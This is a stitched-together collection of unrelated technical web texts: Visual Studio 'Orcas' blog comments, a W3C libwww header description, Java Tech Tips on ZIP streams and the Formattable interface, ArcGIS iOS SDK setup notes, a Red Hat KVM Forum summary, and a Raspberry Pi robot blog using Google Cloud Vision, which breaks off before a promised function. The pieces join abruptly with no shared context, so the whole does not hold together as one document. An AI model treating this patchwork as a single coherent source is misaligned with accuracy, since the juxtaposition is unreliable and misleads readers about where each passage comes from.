I'm glad that the orcas team has added elements that dreamweaver has had for about a decade. Good stuff, keep it up.
I'm loving these improvements to the HTML editor and WYSIWYG designer. They are definitely some of the worst pieces of VS. Can't wait for the release. Cheers
To get a jump on the interface, a new site just popped up called LearnExpression.com. It's from the same group that built LearnVisualStudio.Net.
I do agree with the earlier posting about multiple monitor support. Even Bill has 3 monitors on his desk!
The Visual Studio Visual Web Designer and HTML Editor have been the worst pieces of VS. I am happy to hear about this big improvement and I can't wait to see it in action.
thanks.
I'm really happy to hear that this will integrate into VS. I'm not too crazy about the existing web designer. And since I have yet to catch up on Expression but feel right at home in VS2005, this makes things that much easier...
Will there be a WPF/E designer in Visual Studio "Orcas"?
You write "...I'm planning to record some videos..."
Since I just yesterday dug into screencasting (and found a good free tool), I would like to hear what kind of tools you/Microsoft use to make screencasts.
Hi Uwe,
We typically use "Camtasia" to record videos. I've found it pretty easy to use and it seems to work really well.
Hope this helps,
I'm surprised you don't use Windows Media Encoder to record your screen captures.
Will the new designer resolve "~/css/1.css" paths correctly? Expression Web wouldn't recognize external css or script files that used tilde notation. Images worked as long as <asp:Image was used (I think..), although paths in html elements with runat=server set failed.
For the present (with VS2005), how can I reference an external CSS file without breaking design-time support? URL rewriting requires that ~/ paths are used.
I am using Themes whenever possible to make this a non-issue, but there are places where it is necessary. Also, for some reason, design-time support breaks if I use 'Theme=' instead of 'StylesheetTheme='.
Nathanael Jones
Two monitors side by side? What a headache. Try a slick 22" widescreen LCD - works like a dream for me.
Who can help me with .htaccess?
Where can I find full information about .htaccess file syntax?
Good to see new improvements to the IDE. Great people, great work.
I don't know if Orcas has this or not, but here's something I think would have a HUGE impact on how asp.net apps are written. Let's say I have this:
<table style="width:100%" class="table_css">
<tr>
<td class="header_css">
<asp:Literal runat... />
</td>
<td align="right">
<asp:Button runat ... />
</td>
</tr>
</table>
A lot of times I find myself using the same piece of code on many pages. If I decide to change the css for the table I would have to hunt down this piece of code in all my aspx pages.
A solution for this is to build a custom templated control. But, needless to say it's cumbersome and unless the code is reusable in other projects it would probably not make sense to invest the time. Plus, having a custom control forces you to mix HTML code with CS or VB.
The ideal "solution" (IMO) would be to have this built-in as a functionality of the User Control. It's already there, but the current implementation is rather a hack (i.e. you still have to do "a lot" of coding in the ascx's code behind) and doesn't have any design-time support (pretty much breaks the page). Anyway, here's what I think would be cool:
In ASCX:
<table style="width:100%">
<td class="header">
<* Template Name="Title" *>
<* Template Name="Button" *>
And in the ASPX
<uc1:MyControl runat... >
<Title>Some title</Title>
<Button><asp:Button runat.../></Button>
</uc1:MyControl>
I've used the <* *> syntax just to emphasize that it could be anything. The same principle used in Master Pages could be used. What I would need is to be able to select the control (the ASP Button inside Button tag) and change its properties (much like the MultiView works). Quite frankly I only use the design mode to be able to easily assign event handlers. Also, I need to be able to reference the Button defined inside the Button tag as if it was declared outside of the user control.
The idea is to have a way to centralize ALL the repetitive HTML code!
I really hope you guys already have something like this planned.
Over the last week or so our team has been planning what we will be working on over the next 12 months.
/*
** (c) COPYRIGHT MIT 1995.
** Please first read the full copyright statement in the file COPYRIGHT.
*/

Descriptions appearing in directory listings are produced by this module. This may be overridden by another module for those who wish descriptions to come from somewhere else. It is only HTTP directory listings that contain a description field (if enabled by the Directory browsing module).
This module is implemented by HTDescpt.c, and it is a part of the W3C Sample Code Library.
#ifndef HTDESCRIPT_H
#define HTDESCRIPT_H
The name of the description file is given by HTDescriptionFile, and the file is looked for in the same directory as the directory to be listed. The default value is .www_descript:

extern char * HTDescriptionFile;

In the description file, lines starting with a word beginning with 'D' are taken to be descriptions (this looks funny now, but it makes it easy to extend these description files to also contain other information). An example of the format of the description file is:
/*
** DESCRIBE  welcome.html   Our welcome page
** DESCRIBE  map*.gif       Map as a GIF image
** DESCRIBE  map*.ps        Map as a PostScript image
*/
If a description is not found and the file is of type text/html, this module uses the HTML TITLE as the description. This feature can be turned off by setting the HTPeekTitles variable to false.

extern BOOL HTPeekTitles;
The description file is read in by HTReadDescriptions(), and the result returned by it is given as an argument when finding out a description for a single file.

extern HTList * HTReadDescriptions (char * dirname);
After the descriptions have been read by HTReadDescriptions(), the function HTGetDescription() can be used to get a description for a given file:

extern char * HTGetDescription (HTList * descriptions, char * dirname, char * filename, HTFormat format);

The directory name has to be present because this function may then take a peek at the file itself (to get the HTML TITLE, for example). If format is WWW_HTML and a description is not found, this module may be configured to use the HTML TITLE as the description.
No string returned by this function should be freed!
The list returned by HTReadDescriptions() must be freed by HTFreeDescriptions():

extern void HTFreeDescriptions (HTList * descriptions);
#endif /* !HTDESCRIPT_H */
Welcome to the Core Java Technologies Tech Tips for May 2007. Core Java
Technologies Tech Tips provides tips and hints for using core Java technologies
and APIs in the Java Platform, Standard Edition 6 (Java SE 6).
This issue provides tips for the following:
» Controlling the Creation of ZIP/JAR Entries
» Using printf with Custom Classes
These tips were developed using Java SE 6. You can download Java SE 6 from the Java SE Downloads page.
The author of this month's tips is John Zukowski, president and principal consultant of JZ Ventures, Inc..
A handful of earlier tips have explored JAR files:
Previous tech tips have described listing, reading, and updating archived content,
but not much has been said about how to create JAR or ZIP archives. Because the
JAR-related classes are subclasses of the ZIP-related classes, this tip is more
specifically about the ZipOutputStream and the java.util.zip package.
Before digging into creating ZIP or JAR files, it is important to mention their purpose: packaging a set of files into a single archive, and compressing those added files.
First up is creating zip files, or more specifically zip streams. The
ZipOutputStream offers a stream for compressing the outgoing bytes. There is a
single constructor for ZipOutputStream, one that accepts another OutputStream:
public ZipOutputStream(OutputStream out)
If the constructor argument is of type FileOutputStream, then the compressed bytes written by the ZipOutputStream end up in the named file:
String path = "afile.zip";
FileOutputStream fos = new FileOutputStream(path);
ZipOutputStream zos = new ZipOutputStream(fos);
Each entry added to the archive is represented by a ZipEntry. You can sort the results of the entries() method of ZipFile to produce a list in alphabetical or size order, but the entries are still stored in the order they were written to the output stream.
When an entry is stored without compression (setMethod(ZipEntry.STORED)), you must set its size, compressed size, and checksum yourself, computing the checksum with the CRC32 class of the java.util.zip package. You cannot just pass in 0 or -1 to ignore the checksum value; the CRC value will be used to validate your input when creating the ZIP and when reading from it later.
entry.setMethod(ZipEntry.STORED);
entry.setCompressedSize(file.length());
entry.setSize(file.length());
CRC32 crc = new CRC32();
crc.update(<< all the bytes for entry >>);
entry.setCrc(crc.getValue());

Combined with putNextEntry(), writing a stored entry then looks like this:
ZipEntry entry = new ZipEntry(name);
entry.setMethod(ZipEntry.STORED);
entry.setCompressedSize(file.length());
entry.setSize(file.length());
entry.setCrc(crc.getValue());
zos.putNextEntry(entry);
zos.write(buffer, 0, bytesRead);
zos.closeEntry();
zos.close();
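To see the whole flow end to end, here is a self-contained sketch (the entry names and contents are invented for illustration) that writes one DEFLATED and one STORED entry into an in-memory archive, then reads the archive back to show that entries come out in the order they were written:

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.util.zip.CRC32;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

public class ZipDemo {
    public static void main(String[] args) throws IOException {
        byte[] data = "Hello, ZIP!".getBytes("UTF-8");

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ZipOutputStream zos = new ZipOutputStream(bos);

        // DEFLATED is the default: sizes and CRC are computed for you
        zos.putNextEntry(new ZipEntry("hello-deflated.txt"));
        zos.write(data);
        zos.closeEntry();

        // STORED: size, compressed size, and CRC must be supplied up front
        CRC32 crc = new CRC32();
        crc.update(data);
        ZipEntry stored = new ZipEntry("hello-stored.txt");
        stored.setMethod(ZipEntry.STORED);
        stored.setSize(data.length);
        stored.setCompressedSize(data.length);
        stored.setCrc(crc.getValue());
        zos.putNextEntry(stored);
        zos.write(data);
        zos.closeEntry();

        zos.close();

        // Entries are read back in the order they were written
        ZipInputStream zis = new ZipInputStream(
                new ByteArrayInputStream(bos.toByteArray()));
        ZipEntry e;
        while ((e = zis.getNextEntry()) != null) {
            System.out.println(e.getName());
        }
        zis.close();
    }
}
```

Running the sketch prints hello-deflated.txt followed by hello-stored.txt, regardless of alphabetical order, confirming that the archive preserves insertion order.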
For more information on JAR files, including how to seal and
version them, be sure to visit the Packaging Programs in JAR Files
lesson in The Java Tutorial.
Java SE 1.5 added the ability to format output using formatting strings like
"%5.2f%n" to print a floating point number and a newline. An October 2004 tip
titled Formatting Output with the New Formatter described this.
The Formattable interface is an important feature but wasn't part of the
earlier tip. This interface is in the java.util package. When your class
implements the Formattable interface, the Formatter class can use it to
customize output formatting. You are no longer limited to what is printed by
toString() for your class. By implementing the formatTo() method of
Formattable, you can have your custom classes limit their output to a set width
or precision, left or right justify the content, and even offer different
output for different locales, just like the support for the predefined system
data types.
The single formatTo() method of Formattable takes four arguments:
public void formatTo(Formatter formatter, int flags, int width, int precision)
The formatter argument represents the Formatter from which to get the locale and
send the output when done.
The flags parameter is a bitmask of the FormattableFlags set. The user can have
a - flag to specify left justified (LEFT_JUSTIFY), ^ flag for locale-sensitive
uppercase (UPPERCASE), and # for using the alternate (ALTERNATE) formatting.
A width parameter represents the minimum output width, using spaces to fill the
output if the displayed value is too short. The width value -1 means no
minimum. If output is too short, output will be left justified if the flag is
set. Otherwise, it is right justified.
A precision parameter specifies the maximum number of characters to output. If
the output string is "1234567890" with a precision of 5 and a width of 10, the
first five characters will be displayed, with the remaining five positions
filled with spaces, defining a string of width 10. Having a precision of -1
means there is no limit.
A width or precision of -1 means no value was specified in the formatting
string for that setting.
When creating a class to be used with printf and Formatter, you never call the
formatTo() method yourself. Instead, you just implement the interface. Then,
when your class is used with printf, the Formatter will call formatTo() for
your class to find out how to display its value. To demonstrate, let us create
some object that has both a short and long name that implements Formattable.
Here's what the start of the class definition looks like. The class has only
two properties, an empty implementation of Formattable, and its toString()
method.
import java.util.Formattable;
import java.util.Formatter;

public class SomeObject implements Formattable {
    private String shortName;
    private String longName;

    public SomeObject(String shortName, String longName) {
        this.shortName = shortName;
        this.longName = longName;
    }

    public String getShortName() {
        return shortName;
    }

    public void setShortName(String shortName) {
        this.shortName = shortName;
    }

    public String getLongName() {
        return longName;
    }

    public void setLongName(String longName) {
        this.longName = longName;
    }

    public void formatTo(Formatter formatter, int flags,
            int width, int precision) {
        // Empty for now; filled in below
    }

    public String toString() {
        return longName + " [" + shortName + "]";
    }
}
As it is now, printing the object with println() will display the long name,
followed by the short name within square brackets as defined in the toString()
method. Using the Formattable interface, you can improve the output. A better
output will use the current property values and formattable flags. For this
example, formatTo() will support the ALTERNATE and LEFT_JUSTIFY flags of
FormattableFlags.
The first thing to do in formatTo() is to find out what to output. For
SomeObject, the long name will be the default to display, and the short name
will be used if the precision is less than 7 or if the ALTERNATE flag is set.
Checking whether the ALTERNATE flag is set requires a typical bitwise flag
check. Be careful with the -1 value for precision because that value means no
limit. Check the range for the latter case. Then, pick the starting string
based upon the settings.
String name = longName;
boolean alternate =
(flags & FormattableFlags.ALTERNATE) == FormattableFlags.ALTERNATE;
alternate |= (precision >= 0 && precision < 7);
String out = (alternate ? shortName : name);
Once you have the starting string, you get to shorten it down if necessary,
based on the precision passed in. If the precision is unlimited or the string
fits, just use that for the output. If it doesn't fit, then you need to trim
it down. Typically, if something doesn't fit, the last character is replaced by
a *, which is done here.
StringBuilder sb = new StringBuilder();
if (precision == -1 || out.length() <= precision) {
    sb.append(out);
} else {
    sb.append(out.substring(0, precision - 1)).append('*');
}
To demonstrate how to access the locale setting, the example here will
reverse the output string for Chinese. More typically a translated starting
string will be used based on the locale. For numeric output, the locale defines
how decimals and commas appear within numbers.
if (formatter.locale().equals(Locale.CHINESE)) {
    sb.reverse();
}
Now that the output string is within a StringBuilder buffer, you can fill up
the output buffer based upon the desired width and justification setting. For
each position available within the desired width, add a space to beginning or
end based upon the justification formattable flag.
int len = sb.length();
if (len < width) {
    boolean leftJustified = (flags & FormattableFlags.LEFT_JUSTIFY)
            == FormattableFlags.LEFT_JUSTIFY;
    for (int i = 0; i < width - len; i++) {
        if (leftJustified) {
            sb.append(' ');
        } else {
            sb.insert(0, ' ');
        }
    }
}
The last thing to do is to send the output buffer to the Formatter. That's done
by sending the whole String to the format() method of formatter:
formatter.format(sb.toString());
Add in some test cases, and that gives you the whole class definition, shown
here:
import java.util.Formattable;
import java.util.FormattableFlags;
import java.util.Formatter;
import java.util.Locale;

public class SomeObject implements Formattable {

    // ... fields, constructor, getters/setters, and toString() as shown earlier ...

    public void formatTo(Formatter formatter, int flags,
            int width, int precision) {
        StringBuilder sb = new StringBuilder();

        // Decide between the long and short name
        String name = longName;
        boolean alternate = (flags & FormattableFlags.ALTERNATE)
                == FormattableFlags.ALTERNATE;
        alternate |= (precision >= 0 && precision < 7);
        String out = (alternate ? shortName : name);

        // Setup output string length based on precision
        if (precision == -1 || out.length() <= precision) {
            sb.append(out);
        } else {
            sb.append(out.substring(0, precision - 1)).append('*');
        }

        if (formatter.locale().equals(Locale.CHINESE)) {
            sb.reverse();
        }

        // Setup output justification
        int len = sb.length();
        if (len < width) {
            boolean leftJustified =
                    (flags & FormattableFlags.LEFT_JUSTIFY) ==
                    FormattableFlags.LEFT_JUSTIFY;
            for (int i = 0; i < width - len; i++) {
                if (leftJustified) {
                    sb.append(' ');
                } else {
                    sb.insert(0, ' ');
                }
            }
        }

        formatter.format(sb.toString());
    }

    public static void main(String args[]) {
        SomeObject obj = new SomeObject("Short", "Somewhat longer name");
        System.out.printf(">%s<%n", obj);
        System.out.println(obj); // Regular obj.toString() call
        System.out.printf(">%#s<%n", obj);
        System.out.printf(">%.5s<%n", obj);
        System.out.printf(">%.8s<%n", obj);
        System.out.printf(">%-25s<%n", obj);
        System.out.printf(">%15.10s<%n", obj);
        System.out.printf(Locale.CHINESE, ">%15.10s<%n", obj);
    }
}
Running this program produces the following output:
>Somewhat longer name<
Somewhat longer name [Short]
>Short<
>Short<
>Somewha*<
>Somewhat longer name     <
>     Somewhat *<
>     * tahwemoS<
The test program creates a SomeObject with a short name of "Short" and a long
name of "Somewhat longer name". The first line here prints out the object's
long name with the %s setting. The second outputs the object via the more
typical toString(). The third line uses the alternate form. The next line
doesn't explicitly ask for the alternate short form, but because the precision
is so small, displays it anyways. Next, a precision is specified that is long
enough to not use the alternate format, but too short to display the whole long
name. Thus, a "*" shows more characters are available. Next the longer name is
displayed left justified. The final two show what happens when the width is
wider than the precision, with one also showing the reversed "Chinese" version
of the string.
That really is all there is to make your own classes work with printf. Whenever
you want to display them, be sure to use a properly configured %s setting
within the formatting string.
If you still have questions about using printf, be sure to visit the earlier
tip mentioned at the start of this tip, titled Formatting Output with the New Formatter.
For more information on the Formattable interface, see the documentation for the interface.
ArcGIS Runtime SDK for iOS provides an Objective-C API for developers that allows you to add mapping and GIS functionality to your iPhone, iPod touch, and iPad applications. The API leverages functionality provided by ArcGIS Server services through the REST interface. The API primarily provides a map component and tasks. The map component displays map content from layers or webmaps which in turn rely on backing Tiled or Dynamic map services. You can also add Graphics on the map to display your own points or areas of interest. Tasks provide functionality such as identifying features on a map, querying features given some criteria, geocoding and reverse geocoding addresses, running geoprocessing jobs, performing network analysis such as routing, etc.
The API is distributed as a framework called ArcGIS. This framework is installed by default under ${HOME}/Library/SDKs/ArcGIS. Classes and functions defined in this framework begin with the prefix AGS. This prefix acts as a namespace and prevents naming conflicts with classes defined in your application or other frameworks you use.
You need to use a minimum of the iOS 4 SDK to build your applications. Be sure to set your Xcode project's Base SDK setting accordingly.
The API depends upon the following iOS frameworks and libraries. These need to be added to your Xcode project as references -
You need to set the project's Framework Search Paths setting to include ${HOME}/Library/SDKs/ArcGIS, and the Other Linker Flags setting to include the following entries: -ObjC -all_load -framework ArcGIS
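If you prefer keeping build settings out of the project file, the same two settings can also live in an .xcconfig configuration file. This fragment is a sketch that assumes the default install location mentioned above:

```
// ArcGIS.xcconfig — add to the project's build configurations
FRAMEWORK_SEARCH_PATHS = $(inherited) $(HOME)/Library/SDKs/ArcGIS
OTHER_LDFLAGS = $(inherited) -ObjC -all_load -framework ArcGIS
```

The $(inherited) entries preserve any search paths or linker flags already set at the project or target level.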
You must also add the ArcGIS.bundle file found under ${HOME}/Library/SDKs/ArcGIS/ArcGIS.framework/Versions/Current/Resources to your project. This bundle file contains the resources (images, etc) used by the API.
The ArcGIS library depends upon and already includes the following third party libraries -
The functions/classes in these libraries have been renamed/namespaced to avoid conflicts with other versions of these libraries you may have in your project.
Red Hat blog
Containers and Virtualization
One of the over-arching themes I noticed at the Forum was how developers can make virtualization more attractive for users who are considering containers as a fundamental layer of abstraction. Developers are intrigued with the possibility of deploying infrastructure in minutes rather than weeks. Containers also allow developers to define the infrastructure needed for their applications and ensure that each time their application is deployed it gets the same resources no matter the environment. Containers do not provide the same level of isolation as virtual machines. A VM has an entire operating system to itself that believes it's installed on its own (virtual) hardware. It must share resources with the other VMs running on the same host, but the hypervisor proxies access to physical resources. A container has only the binaries and libraries defined as required available to it, and runs on the same (Linux) kernel as other containers. The kernel proxies access to physical resources like it does any other user-mode process. Cgroups and namespaces provide isolation. For environments where high security or guaranteed performance is required, this is not a sufficient level of isolation.
Speed of deployment is one of the main drivers for adoption of containers. Because of the light level of isolation, containers can be deployed very quickly. Rather than provisioning an entire virtual server and installing an operating system, when deploying a container we need only define the container parameters and download any libraries we might be missing. KVM developers want to help users enjoy the benefits of both technologies by making VM deployments as speedy as containers. That means we want to pre-empt as much as possible so a responsive Operating System is available as soon as possible after provisioning.
I/O Performance
By far, the bulk of the conversation about KVM development in 2016/2017 was about improving I/O performance. As I mentioned, I’m new to Red Hat but not new to virtualization. I find a lot of my conversations about virtualization with customers inevitably lead to a discussion of I/O performance. There are a few different tracks of development related to I/O performance. KVM-rt is the KVM Realtime work. Some notable sessions that addressed this topic include:
- Real Time KVM by Red Hat’s Rik van Riel. Rik goes into some detail around the challenges of realtime in the context of KVM virtualization.
- Alex Williamson’s presentation on PCI Device Assignment with VFIO was awesome. His GitHub presentation gets into even more detail. He spends a good deal of time explaining how VFIO works, starting at basic device assignment and building up to VFIO. I’ve seen benchmark results from VFIO testing and have worked with some customers testing out VFIO. As we see more implementations of KVM for applications like NFVI, I expect we will need to take advantage of VFIO to supply direct device access to Virtual Machines in a safe way.
- Wei Wang from Intel’s presentation proposed a new way of communication between VMs - Vhost-pci. His testing was an interesting experiment in inter-VM connectivity. He is working to speed up communication between VMs, focused on the NFVI. VNFs can be sensitive to latency, and his approach could possibly improve performance by shortening the path from VM to VM. There was a great deal of feedback from the developers in attendance. You can find more details about the proposal from the qemu-devel mailing list.
- The conversation around virtualizing GPUs continues to get more interesting. Neo Jia and Kirti Wankhede presented Nvidia’s recommended approach to a mediated I/O device framework. This framework is VFIO based and built to allow virtualization of devices without SR-IOV. The framework would allow for a full discovery of virtual devices and allow for full lifecycle management because the device becomes virtual! The duo from Nvidia detailed their approach to the problem and demonstrated a functional environment leveraging an Nvidia Tesla M60. Virtual devices were created, then passed to QEMU as vfio-pci devices.
Continuing Security Efforts
Security is a theme woven into the fabric of the KVM project.
Jun Nakajima presented the results of an Intel PoC to secure the kernel in a virtualized environment. The focus of the conversation was hardening the VMM (Virtual Machine Manager, or hypervisor) to ensure guest VMs are isolated from the host kernel even more than in today's standard KVM deployment. The Intel team is also testing enhancements to the VMM that could be offloaded to hardware. Fascinating work; you can find the deck here.
Steve Rutherford from Google walked through his team’s approach to hardening virtualization hosts while preserving performance. Their focus is on reducing the attack surface available to guest VMs. Moving more KVM code to Userspace helps, but risks an impact to performance. His presentation dives into how they’ve approached the balance between performance and security. Steve and team spent a good deal of time testing performance and shared these results with the group. You can find these results in the linked presentation.
AMD is looking at ways to secure access to memory. Thomas Lendacky presented their approach, "Secure Encrypted Virtualization". They suggest offloading inline memory encryption and encryption key management to on-die engines they have built. It's an interesting approach to isolate VMs and containers from each other, as well as isolating the workloads from the underlying hypervisor. AMD is still developing the firmware (proprietary), Linux drivers, kernel support and KVM/QEMU support.
The Future of KVM
A number of sessions throughout the 3-day forum were focused on where KVM is going. For a community driven project like KVM, the roadmap isn’t just about features and bug fixes, it’s also about how the community can work together better. How can we be more efficient communicating, reviewing and accepting patches?
A good introduction to the topic is the panel discussion with some key figures in KVM development. Daniel Berrange and Paolo Bonzini from Red Hat, Andrew Honig from Google, and Den Lunev from Virtuozzo had a conversation about where KVM has been, and where it’s going in future as they reviewed pre-canned questions and addressed questions from the collected development team.
Stefan Hajnoczi spoke in detail about how Open Source Internships can help the QEMU Community Grow in his presentation. The QEMU project has participated in the Google Summer of Code since 2010, and in 2014 also began working with Outreachy. Stefan went on to outline how these programs have benefited the community and some guidelines for other projects considering participating in similar mentoring programs.
Lessons Learned
The KVM developer community is very accepting. Perhaps a few folks reading will chuckle at that statement. I’m sure submitting patches can be frustrating at times as with any large project. But in my short experience interacting with folks, everyone was quick to share information and were very open to explaining development concepts to a server guy.
The only accurate documentation in a project like KVM is the code. I’ve since gone back to the C programming language, refreshing my development skills so I can better understand what’s happening. When looking for details about the new developments in KVM, the best place to go to, is the code. The beautiful thing about KVM as a virtualization platform is that everything is out in the open. That provides users with some powerful abilities in terms of understanding performance, troubleshooting issues.
There continues to be a vibrant community focused on virtualization. There are of course some very large organizations contributing to KVM, but the lion’s share of code comes from independent developers. That makes for a lively community producing great code!
This was a sampling of the themes and amazing presentations from the 2016 KVM Forum. You can find the entire agenda here and see many more sessions! | https://www.redhat.com/en/blog/notes-field-summary-kvm-forum | CC-MAIN-2020-40 | refinedweb | 1,327 | 54.73 |
Human beings can be utterly perplexing sometimes.
After all, our species have this (not so) amazing talent to form a totally uninformed opinion on just about everything. Regardless of whether we know anything about the things that we have become so determined to either a) like, or b) dislike.
# BEGIN: Deeply philosophical interlude.
What's more, once opinions have been assigned to the mysterious (and somewhat immutable) data structures defined deep in our (mostly cranial) cavities, they are near-impossible to alter. It simply becomes a part of us. Tragically, we know all too well, that this starts to impact our ability to assess facts impartially, especially if they go against our deep-seated views. And inevitably, this prevents us from making rational, cool-headed decisions on critically important issues. To top it all off, we like to voice our opinions loudly. Over. And. Over. Again. To whomever that listens.
# END: Deeply philosophical interlude. Return to normal garbage.
So based on our extremely scientific 15-second study of human psychology, we've finally decided to equip Rosie Patrol with much-hyped about FI or Fartificial Intelligence (commonly known in not-so renowned academic circles as farcical intelligence akin to neurological flatulence).
And why would a superhero robot like Rosie Patrol require this? It's because guardians of the
All in all, it is our hope that this much needed downgrade will allow Rosie Patrol to closely mimic the "best" of human behaviour. Such as:
- Instantly offering a completely unfounded opinion on something that we see, even though no-one asked (and no-one actually cares). Fight wars based on these opinions, if you've got nothing better to be doing.
- Only changing those opinions if we absolutely have to. Actually, let's not. It's just easier to live with them. Forever. Than admit that you're wrong.
- Go on and on (and on) about the things that we just happen to have an opinion on - at the expense of infinitely more important matters. Bizarrely, some people might even like hearing you go on and on (and on) about them... thereby creating an infinite loop of never-ending stupidity.
Happy? Roll on Project FI!
All superheroes need:
- We're still operating 2 Raspberry Pi 3s here, both running Raspbian OS: rosie-01 and rosie-02. Connected to each other over Wi-Fi, and to the Internet. You'll notice that we're using the API endpoints we created previously using Flask to remotely control various parts of Rosie, like her motors, lights and eyes. Yes, it's completely unnecessary.
- No new gadgets are strictly required here. However, it doesn't mean we've disposed of any of the old ones. Nope, Rosie Patrol is still very much equipped to her eyeballs with random gadgetry, such as:
- Relay-controlled head torch... why not? It's so this season.
- Dot LED matrix displays... for Rosie Patrol's expressive eyes. After all, farcical opinions seem a lot more legitimate when they are accompanied by distracting lighting.
- Raspberry Pi Camera Module V2... quite important this one, actually.
- Speaker... you'll need this to hear Rosie Patrol's inner thoughts.
- Servo motors and controller... make Rosie Patrol's neck move (yes, it's completely over the top).
- DC motor controller board and wheels... would you really prefer to carry a robot around instead?
Already completed these missions?
- Lights in shining armour
- I'm just angling around
- Eye would like to have some I's
- Eh, P.I?
- Lights, camera, satisfaction
- Beam me up, Rosie!
- a, b, see, d
- Code: read
Your mission, should you accept it, is to:
- Modify our Python REST API destined to Google Cloud Vision API to carry out label detection, instead of text detection (OCR). It will literally take less time to change this than it just took to read this sentence.
- Write some Python code to process the labels (objects) that are detected by, and returned from Google Cloud Vision API
- Forget all you know about intelligence, and implement something significantly subpar. Create Python code to form random opinions, irritatingly voice them (over and over again) and introduce suspiciously human-like bias.
- Pilot her around space (no, not that one) filled with highly thought-provoking test objects, and listen to her sound like Marvin out of The Hitchhiker's Guide to the Galaxy
The brief:The basic principles behind this experiment were actually put together during our little (and surprisingly popular!) detour to get Rosie to play Countdown. In it, we discovered that we could:
- Take photos of the environment using Raspberry Pi Camera Module V2. Specifically, of the TV screen showing Countdown.
- Send photos to Google Cloud Vision API using Python's Requests module, to perform Optical Character Recognition (OCR)
- Do some Python stuff, using a pre-complied dictionary, with the detected text to solve Countdown's letters round. This bit is totally redundant for this experiment.
- Use Python gTTS to produce a mp3 file of robot saying the top scoring answer
- Play it back to humans, using omxplayer
To this end, we could train our very own machine learning Classification algorithm; that is, a program that attempts to categorise a bunch of similar data (in our case, camera images) into pre-defined labels (for example, names or descriptions of objects), according to certain attributes present in the data. We'd feed it lots of images to train our algorithm, and measure its accuracy using test images. The problem is, we'd probably spend months on end feeding our program pictures of things that we find around the house, and tuning the algorithm to ensure it is correctly detecting the objects in them. It also involves you actually having to know some pretty clever stuff (like maths), and possibly the use of some more powerful computers, to develop anything remotely usable. Unless you're planning to be an expert in Machine Learning*, it's probably not the best use of your precious time.
*Probably not a bad idea, since most jobs will soon be held by robots anyway (...apparently)
...That's why we'll be returning to using Google Cloud Vision API, specifically its label detection feature, to do all this clever stuff for us.
Here is a clearly scientific (and somewhat unintentionally encrypted) blueprint for this highly sophisticated experiment.
Accompanied by somewhat less cryptic text:
And oh yes, we'll be once again controlling Rosie Patrol's movements around a
Information overload:We previously used Google Cloud Vision API to perform Optical Character Recognition (OCR). We'll now use it for recognising objects.
Thankfully, as the documentation makes clear, this task is actually as trivial as changing a JSON value of type to LABEL_DETECTION. Send this to Google Cloud Vision API in a REST API POST request, along with the base-64 encoded image taken by the Pi Camera, using the Python Requests module. And that's about it for the label detection phase of Project FI.
def _construct_google_vision_json(image=None): data = { "requests": [ { "image": { "content": "" }, "features": [ { "type": "LABEL_DETECTION" } ] } ] } data["requests"][0]["image"]["content"] = _encode_image(image) return data
There's a slight difference in how we handle the response, however. Unlike before with text detection, the JSON response back from the Google mothership consists of multiple potential objects that have been detected in the image, along with a confidence score. This means we now need to look through multiple "labelAnnotations" records stored in the JSON response.
Something like this will allow us to store the multiple objects in a list.
def _find_objects_in_image(image=None, url=None, token=None): if not path.exists(image): print("File", image, "does not exist") sys.exit() r_request = _post_json_request(url+token, _construct_google_vision_json(image)) if r_request.status_code == 200: if r_request.json()["responses"][0]: return r_request.json()["responses"][0]["labelAnnotations"] else: print("HTTP error encountered", r_request.status_code)
Clearly, none of this is meaningful, unless we run it after taking a photo using Pi Camera. Out comes our function we used before, now with the ability to archive the photos being taken (so that we can inspect them later, rather than being overwritten).
def _detect_object(camera): camera.capture(SOURCE_IMAGE) discovered = _find_objects_in_image(SOURCE_IMAGE, GOOGLE_VISION_API, GOOGLE_VISION_TOKEN) copyfile( SOURCE_IMAGE, ARCHIVE_IMAGE+datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")+".jpg" ) return discovered
If everything is working correctly, we should be able to do something like this to look through the list of objects (described in dictionaries) that have been detected. This particular implementation will allow us to pick the object with the highest confidence score. And send it to our _form_random_opinions() function for processing by the core code underpinning the hyper-intelligence of Project FI. In our actual code (right at bottom of post), we actually implemented some bias here for Rosie Patrol to favour objects that she has already formed an opinion on (more on this in a minute).
discovered_objects = _detect_object(cam1) if discovered_objects is not None: best_match = {} best_score = 0 for discovered_object in discovered_objects: if discovered_object["score"] > best_score: best_match = discovered_object speech = _form_random_opinions(best_match["description"])
Now, we realise that we kept promising you the stupidification of robot intelligence on a grand scale. And everything so far seems boringly sensible. And worryingly, quite useful.
Here's a completely unrelated before photo of Rosie Patrol, prior to being subjected to human interference. She is quite clearly very sophisticated.
Back to our mission.
That's right: _form_random_opinions() is precisely where we are attempting to scientifically mimic human behaviour. No expense has been spared in developing this advanced military-grade algorithm. It puts the F back into FI. Yes, we're doing well. We're cooking on gas.
The function revolves around 2 lists:
rosie_likes = [] rosie_dislikes = []
Not unlike humans, we'll get Rosie Patrol to maintain running lists of things that she likes, and dislikes.
And _form_random_opinions() helps to do these things as objects (new and old) are detected.
- If it's an object that's already in Rosie Patrol's rosie_likes list, we'll randomly construct a positive sentence based on some stock 'like' responses stored in a list of tuples: rosie_likes_preambles
- Similarly, if it's an object that's already in her rosie_dislikes list, we'll randomly construct a negative sentence based on some stock 'dislike' responses stored in a list of tuples: rosie_dislikes_preambles
- If it's an entirely new object, we'll randomly like or dislike it, and store the result in one of our 2 lists. Remember; Rosie Patrol will never change her mind (although stopping the Python application clears her memory, quite literally).
rosie_likes_preambles = [ ("My computer brain goes all fuzzy when I see", "I just love it!"), ("Life is so much better when", "is there."), ("Beautiful. Just beautiful.", "is a work of art."), ("Yes! I couldn't possibly imagine life without", ""), ("Dear ", "I think I'm in love with you.") ]
...And this is _form_random_opinions():
